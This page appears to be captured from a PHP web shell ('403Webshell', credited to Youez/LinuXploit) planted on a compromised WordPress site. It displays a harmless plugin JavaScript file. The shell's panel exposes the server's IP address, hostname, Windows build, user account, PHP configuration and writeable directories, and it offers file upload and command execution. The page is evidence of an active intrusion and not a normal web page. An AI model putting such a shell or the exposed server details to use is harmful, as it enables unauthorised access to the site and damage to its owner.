403Webshell
Server IP : 51.254.39.36  /  Your IP : 216.73.217.109
Web Server : Microsoft-IIS/10.0
System : Windows NT WIN-12GDIEC772I 10.0 build 20348 (Windows Server 2022) AMD64
User : IWPD_21(allbatf787) ( 0)
PHP Version : 8.3.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/allbat-sb.fr/httpdocs/wp-content/plugins/so-widgets-bundle/widgets/cta/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Inetpub/vhosts/allbat-sb.fr/httpdocs/wp-content/plugins/so-widgets-bundle/widgets/cta/js/cta.js
/* globals jQuery, sowb */

var sowb = window.sowb || {};

jQuery( function ( $ ) {
	var setupCta = function () {
		$( '.sow-cta-base' ).each( function () {
			var $$ = $( this );
			var
				$b = $$.find( '.so-widget-sow-button' ),
				$t = $$.find( '.sow-cta-text' );
			
			if ( $t.outerHeight() > $b.outerHeight() ) {
				$b.css( 'margin-top', ( $t.outerHeight() - $b.outerHeight() ) / 2 + 'px' );
			}
		} );
	};
	setupCta();
	
	$( sowb ).on( 'setup_widgets', setupCta );
} );

Youez - 2016 - github.com/yon3zu
LinuXploit